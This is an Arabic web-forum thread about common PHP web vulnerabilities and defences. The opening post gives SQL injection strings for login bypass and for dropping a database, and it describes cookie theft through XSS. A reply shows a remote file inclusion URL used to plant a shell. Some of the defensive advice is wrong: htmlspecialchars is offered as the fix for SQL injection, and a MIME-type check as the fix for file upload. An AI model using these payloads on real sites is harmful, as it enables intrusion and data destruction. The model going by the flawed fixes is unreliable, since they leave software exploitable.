بحث متقدم | التسجيل
الويب العربي
  تسجيل دخول
 
   
   

  ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.




الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.

عـودة للخلف   الويب العربي المركز التعليمي المجاني أمن المعلومات

أمن المعلومات مقالات, أخبار, مواضيع حول أمن المعلومات, وحماية أنظمة التشغيل, الشبكات, المواقع, البيانات السرية.

موضوع مغلق اضف موضوع جديد
 
خيارات الموضوع طريقة العرض
  #1  
قديم 22-10-2007, 08:09 PM
like_php like_php غير متصل
عضو
 
تاريخ التسجيل: Nov 2005
مشاركة: 52
مستوى تقييم العضوية: 19
like_php is on a distinguished road
الافتراضي أشهر الثغرات وطرق الحماية منها

السلام عليكم ورحمة الله وبركاته

تمتاز برمجة الموقع الإلكترونية عن غيرها من لغات البرمجة بكثرة مستخدمي هذا البرنامج , فهو متاح لملايين الناس لاستخدامه وهم طبعاً زوار الموقع.

ولهذا فأننا بحاجة لحماية هذا البرنامج وخصوصاً استهداف المواقع العربية والإسلامية من اعداء الأمة , ولهذا سأقوم بشرح مبسط لأشهر أنواع الثغرات وكيفية الحماية منها:

1- sql injection الحقن بجمل sql

اشهر انواع الثغرات و اخطرها ! , هذه الثغره تظهر في البرامج التي تستخدم "قواعد البيانات" في عملها , محركات قواعد البيانات مثل MySQL , MSSQL , Oracle و غيرها تستخدم لغه واحده من اجل استعلاماتها و تسمى هذه اللغه بـ SQL

وهي أشد انواع الثغرات خطوراً حيث أنه يمكن اختراق الحسابات في موقعك , على سبيل المثال , انك تملك يحتوي على اسم مستحدم وكلمة سر لصغحات معينة , سيكون برنامجك كالاتي:

كود PHP:
$user_name="swalif";
$password="softs";
$query "SELECT * FROM users WHERE user='$user_name' AND password='$password'";
mysql_query($query); 
تخيل لو ان كلمة السر أصبحت
كود PHP:
$password="' OR ''='"
ستصبح أوامر ال sql

كود PHP:
$query "SELECT * FROM users WHERE user='swalif' AND password='' OR ''=''
"
;
mysql_query($query); 
بهذه الطريقة يكون قد استطاع الدخول لاقسام برنامجك المختبفة دون الحاجة لاسم المستخدم أو كلمة السر الصحيحة.

ولا يتوقف الأمر عند ذلك فقط , تخيل لو أنه قام بادخال هذه الجملة على أنها كلمة سر:

كود PHP:
$password="'; DROP DATABASE database_name;" 
سيصبح الأمر البرمجي:

كود PHP:
$query "SELECT * FROM users WHERE user='swalif' AND password=''; DROP DATABASE database_nam";
mysql_query($query); 
تخيل الان ماذا حصل لموقعك ؟

تم حذف قاعدة البيانات بشكل كامل من الموقع .

2) XSS Cross site scripting

نوع آخر من الثغرات الامنيه و يعتبر من الثغرات المنتشره , اعتقد ان هذا النوع من الثغرات أقل خطوره من الـ SQL Injection , هذا النوع من الثغرات يسمح بحقن كود JavaScript في الصفحه .

يأتي البعض و يقول ما هي خطورة مثل هذه الثغره ؟ ما هي الخطوره في حالة قام المخترق بحقن كود JavaScript , حسناً جميع الامثله التي نراها في استغلال أو شرح ثغرات XSS لا تتعدى استخدام دالة alert لطباعة كلمه في النافذه المنبثقه التي عدهناها و لكن الاستغلال الحقيقيه لمثل هذه الثغرات يكون بسرقة الكوكيز , و الكوكيز عباره عن ملفات صغيره تستخدمها المواقع لتخزين معلومات عن مستخدم الحاسوب , مثلاًً برامج المنتديات تعتمد اعتماد كبير على الكوكيز لتذكّر المستخدم بدون الاضطرار لتسجيل دخوله في كل مره , حيث تقوم بتخزين كوكيز يحتوي على اسم المستخدم و كلمة المرور , في الحقيقه كلمة المرور هي ما يستهدفها المخترق , حيث يقوم بحقن الصفحه بكود JavaScript من خلال ثغرة الـ XSS , وظيفة هذا الكود استدعاء صفحه من موقع خارجي و تمرير معلومات الكوكيز إلى هذه الصفحه , و بالتالي إرسال معلومات الكوكيز إلى المخترق .


أما كيفية الحماية من هاتين الثغرتين فبسيط جداً , وهي اضافة دالة :

htmlspecialchars ()

وتقوم هذه الدالة بترميز حروف html كالآتي :

'&' (ampersand) becomes '&'
'"' (double quote) becomes '"' when ENT_NOQUOTES is not set.
''' (single quote) becomes ''' only when ENT_QUOTES is set.
'<' (less than) becomes '&lt;'
'>' (greater than) becomes '&gt;'

بالتالي تكون فد حمت برنامجك من مثل هذه أخطار.

للاستفادة أكثر من هذه الدالة يرجى الاطلاع على :

htmlspecialchars()

أتمنى أن يكون الجميع قد استفاد من هذا المقال

وشكرا






التوقيع
من أعمالنا : 1) جزء من النظام لموقع شبكة عين الإسلام www.eyeislam.net
2) نظام كامل لموقع مستشاركم www.mustasharcom.com
3) نظام كامل لمركز المؤتمنون www.mutaman.com

البريد الإلكتروني والماسنجر :

  #2  
قديم 22-10-2007, 09:04 PM
الصورة الشخصية لـ ss-ksa.com
ss-ksa.com ss-ksa.com غير متصل
عضو
 
تاريخ التسجيل: Feb 2007
مشاركة: 245
مستوى تقييم العضوية: 18
ss-ksa.com is on a distinguished road
الافتراضي

تشكر اخوي على الشرح الرائع فعلا

ولكنك نسيت الاخطر و الاشهر file include ثغرات فايل انكلود التي من خلالها تمكن من رفع الملفات على موقعك

وخاصه رفع الشلات txt واحد يقول وما الخطورة فيtxt اقول وببساطه وضع علامة الاستفهام في اخرة ؟

ويكون قد رفع صفحه php من برمجته و يتحكم بالموقع حسب حماية السيرفر وقد ياخذ root بسببها



ويقةم الاستغلال كتالي

مثلا عندي صفحه باحد السكربات وليكن اسمها web.php

تحتوي على ثغرة فايل انكلود وهذا المتغير قد يكون ss

فيستخدم هكذا
web.php?ss=http://txt.txt?

فيتم رفع الصفحه php و الدخول على السيرفر والباقي فقط يعتمد على حماية السيرفر






التوقيع
  #3  
قديم 24-10-2007, 03:59 AM
like_php like_php غير متصل
عضو
 
تاريخ التسجيل: Nov 2005
مشاركة: 52
مستوى تقييم العضوية: 19
like_php is on a distinguished road
الافتراضي

شكرا لردك أخي الكريم ss-ksa.com

بالنسبة لهذه الثغرة الذي شرحتها مشكوراً هذه أفضل طريقة للحماية منها وهي باضافتها الجملة الشرطية التالية قبل كود مركز رفع الملفاتز

كود PHP:
$var=$_FILE["file"]["type"];
if(
$var=="application/x-php " or $var=="text/plain "
{
echo 
"error message";
}
else
{
//upload code

وشكرا






التوقيع
من أعمالنا : 1) جزء من النظام لموقع شبكة عين الإسلام www.eyeislam.net
2) نظام كامل لموقع مستشاركم www.mustasharcom.com
3) نظام كامل لمركز المؤتمنون www.mutaman.com

البريد الإلكتروني والماسنجر :

  #4  
قديم 24-10-2007, 11:21 AM
!Redghost! !Redghost! غير متصل
عضو
 
تاريخ التسجيل: Oct 2007
مشاركة: 9
مستوى تقييم العضوية: 0
!Redghost! is on a distinguished road
الافتراضي

مشكور يالغلا






التوقيع
شركة التميز للإستضافة والتصميم
www.x77v.com
Linux@x77v.com
0020121577660
  #5  
قديم 25-10-2007, 10:08 AM
تحدوة البشر تحدوة البشر غير متصل
عضو
 
تاريخ التسجيل: Jul 2007
مشاركة: 89
مستوى تقييم العضوية: 17
تحدوة البشر is on a distinguished road
Thumbs up

الله يعطيك العافية





  #6  
قديم 14-11-2007, 03:18 AM
algabil algabil غير متصل
عضو
 
تاريخ التسجيل: Jun 2006
مشاركة: 41
مستوى تقييم العضوية: 0
algabil is on a distinguished road
الافتراضي

تقبلو خالص الشكر والتقدير





  #7  
قديم 02-01-2008, 04:13 PM
iq_www iq_www غير متصل
عضو
 
تاريخ التسجيل: Dec 2007
مشاركة: 7
مستوى تقييم العضوية: 0
iq_www is on a distinguished road
الافتراضي

الله يعطيك العافيه مشكور اخويه





  #8  
قديم 29-01-2008, 01:02 AM
فهد بن شويل الشهراني فهد بن شويل الشهراني غير متصل
عضوية مغلقة
 
تاريخ التسجيل: Jan 2008
مشاركة: 26
مستوى تقييم العضوية: 0
فهد بن شويل الشهراني is on a distinguished road
إرسال رسالة عبر MSN إلى فهد بن شويل الشهراني إرسال رسالة عبر  Skype إلى فهد بن شويل الشهراني
الافتراضي

مشكور الله يعطيك العافية





  #9  
قديم 02-02-2008, 08:05 AM
الفك المفترس الفك المفترس غير متصل
عضو
 
تاريخ التسجيل: Aug 2007
مشاركة: 26
مستوى تقييم العضوية: 0
الفك المفترس is on a distinguished road
الافتراضي

مشكور أخوي

ويعطيك ربي ألف ألف ألف عافية

وفقك الله والسلام عليكم .





  #10  
قديم 02-02-2008, 08:06 PM
3arab-hero 3arab-hero غير متصل
عضو
 
تاريخ التسجيل: Jan 2007
مشاركة: 10
مستوى تقييم العضوية: 0
3arab-hero is on a distinguished road
الافتراضي

بوركت اخي على هذا الشرح





  #11  
قديم 02-02-2008, 08:09 PM
3arab-hero 3arab-hero غير متصل
عضو
 
تاريخ التسجيل: Jan 2007
مشاركة: 10
مستوى تقييم العضوية: 0
3arab-hero is on a distinguished road
الافتراضي

لكن هل للكلمات الممنوعة فائدة؟





  #12  
قديم 03-02-2008, 12:01 AM
الدوكش الدوكش غير متصل
عضو
 
تاريخ التسجيل: Jan 2008
مشاركة: 1
مستوى تقييم العضوية: 0
الدوكش is on a distinguished road
الافتراضي

مشكور أخوي





  #13  
قديم 03-02-2008, 05:53 AM
Marcel Adam Marcel Adam غير متصل
عضو
 
تاريخ التسجيل: Jun 2007
مشاركة: 11
مستوى تقييم العضوية: 0
Marcel Adam is on a distinguished road
الافتراضي

ألف شكر لك يا غالي على الشرح الجميل

تقبل تحياتي





  #14  
قديم 09-02-2008, 07:02 PM
arabwebtalk.com arabwebtalk.com غير متصل
عضو
 
تاريخ التسجيل: Feb 2008
مشاركة: 10
مستوى تقييم العضوية: 0
arabwebtalk.com is on a distinguished road
الافتراضي

مشكورين الى الامام





  #15  
قديم 05-04-2008, 01:51 PM
فلسطينى 1948 فلسطينى 1948 غير متصل
عضو
 
تاريخ التسجيل: Apr 2008
مشاركة: 6
مستوى تقييم العضوية: 0
فلسطينى 1948 is on a distinguished road
الافتراضي

مشكور اخى على هالتوضيح ولك الاحترام على مجهودك





  #16  
قديم 10-04-2008, 01:24 PM
–•¤صـدى الأهات¤•– –•¤صـدى الأهات¤•– غير متصل
عضو
 
تاريخ التسجيل: Mar 2008
مشاركة: 5
مستوى تقييم العضوية: 0
–•¤صـدى الأهات¤•– is on a distinguished road
الافتراضي

يعطيك ربي ألف ألف ألف عافية





  #17  
قديم 29-04-2008, 01:01 AM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
Wink

شكرا لك أخوي العزيز الغالي like_php على هذا الجهد الطيب

وعلى تزويدك لنا بالروابط المفيدة

وهذا الموقع مفيد جداً للتعلم على لغة php

تقبل تحياتي





  #18  
قديم 30-04-2008, 08:56 PM
JntelHost.Com JntelHost.Com غير متصل
عضو
 
تاريخ التسجيل: Apr 2008
مشاركة: 17
مستوى تقييم العضوية: 0
JntelHost.Com is on a distinguished road
الافتراضي

الله يعطيك العافيه وماقصرت





  #19  
قديم 18-05-2008, 02:49 AM
FULL-POWER FULL-POWER غير متصل
عضو
 
تاريخ التسجيل: Feb 2008
مشاركة: 7
مستوى تقييم العضوية: 0
FULL-POWER is on a distinguished road
الافتراضي

يعطيك العافية





  #20  
قديم 18-05-2008, 03:53 PM
r3no r3no غير متصل
عضو
 
تاريخ التسجيل: May 2008
مشاركة: 6
مستوى تقييم العضوية: 0
r3no is on a distinguished road
الافتراضي

لي رجعة للتعليق





موضوع مغلق



خيارات الموضوع
طريقة العرض

قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML مغلق
إنتقل إلى


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 02:02 AM.

Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


 
 »  خدمات البرمجة   »  رئيسية الدليل
  »  خدمات التصميم   »  الأمن والحماية
  »  الدعاية والتسويق
  »  الدعم والتطوير
  »  الشركات الرسمية
  »  حجز دومينات
  »  خدمات الإستضافة
 
 
  »  مكتبة الإستايلات   »  رئيسية المكتبة
  »  أكواد برمجية   »  أدوات الويب ماسترز
  »  مكتبة الهاكات   »  أدوات المصممين
  »  سكربتات متنوعة
  »  مجلات إلكترونية
  »  بلوكات متنوعة
  »  ثيمات مختلفة
 
 

صحيفة متخصصة في متابعة أخبار وجديد الإنترنت العربي
والحوارات الصحفية ومعلومات تقنية متنوعة .

   
 
 

للتواصل مع فريق عمل الويب العربي
يمكنك ذالك من خلال مركز الدعم والمساندة.

 الدعم الفني |  اعتماد العضويات |  قوانين الإنتساب |  إتفاقية الإستخدام |  أهداف الويب العربي |  دليل الشركات |  مكتبة الويب |  صحيفة الويب العربي |  الرئيسية